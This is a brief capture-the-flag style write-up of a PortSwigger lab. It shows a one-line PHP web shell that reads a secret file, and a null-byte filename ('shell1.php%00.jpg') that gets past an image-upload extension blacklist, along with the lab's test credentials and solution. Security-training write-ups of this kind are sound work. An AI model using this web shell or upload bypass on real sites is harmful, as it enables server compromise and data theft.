On this page
apsyleg1 min read
#portswigger #file-upload #rce #null-byte #web-security
Web Shell Upload via Obfuscated File Extension
Lab
Web shell upload via obfuscated file extension · Practitioner
Solution
Given
This lab contains a vulnerable image upload function. Certain file extensions
are blacklisted, but this defense can be bypassed using a classic obfuscation
technique.
To solve the lab, upload a basic PHP web shell, then use it to exfiltrate the
contents of the file /home/carlos/secret. Submit this secret using the button
provided in the lab banner.
You can log in to your own account using the following credentials: wiener:peter
Analysis and recon
Shell is the same:
<?php echo file_get_contents('/home/carlos/secret'); ?>
Drop shell.php:
Sorry, only JPG & PNG files are allowed
Sorry, there was an error uploading your file.
So we have to convince the server it's a JPG or PNG. Let's go through the options.
shell.php.jpg— uploaded, but it's served as an image, didn't work.- The null byte trick did:
Content-Disposition: form-data; name="avatar"; filename="shell1.php%00.jpg"
Content-Type: application/x-php
Re4kTtunnIZsPQSV4FFhRmyNL6FO0gos
Lab solved!
More in this category
Arbitrary Object Injection in PHP (PortSwigger Lab)
Recovering leaked source code and injecting a serialized CustomTemplate object whose __destruct deletes an arbitrary file.
Using Application Functionality to Exploit Insecure Deserialization (PortSwigger Lab)
Tampering with the `avatar_link` field in the session object to delete an arbitrary file via the account-delete feature.
Modifying Serialized Data Types (PortSwigger Lab)
Abusing PHP loose comparison by changing the `access_token` type to integer `0` to bypass authentication.